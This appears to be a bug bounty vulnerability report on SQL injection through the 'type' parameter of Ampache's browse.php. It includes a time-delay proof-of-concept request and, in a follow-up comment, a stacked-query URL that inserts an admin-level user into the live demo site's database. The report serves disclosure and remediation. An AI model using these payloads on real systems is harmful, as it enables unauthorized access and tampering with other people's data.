SQL Injection in ampache/ampache
Reported on
Oct 5th 2021
Description
The application does not validate and escape the type parameter before using it in a SQL statement in Model/Tag.php, leading to a SQL Injection
Proof of Concept
Time delay:
GET /browse.php?action=tag&type=0%27or(if(now()=sysdate(),sleep(3),0))or%27 HTTP/1.1
Host: demo.ampache.dev
sec-ch-ua: "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Impact
Vulnerability allows unauthenticated users to perform SQL injection A successful attack may result the deletion of entire tables and, in certain cases, the attacker gaining administrative rights to a database, write file to server lead to Remote code Execute, or write a script to extract data.
i've replied to your email, do you have a better attack link? this doesn't seem to affect the demo site
Hi, This is an example of slow query attack You can try it with "stacked query" payload: https://demo.ampache.dev/browse.php?action=tag&type=1%27%3b+INSERT+INTO+user+(username,access)+VALUES+(%27Laladee%27,%27100%27)%3b%27 You can check it out, new user named "Laladee" successfully added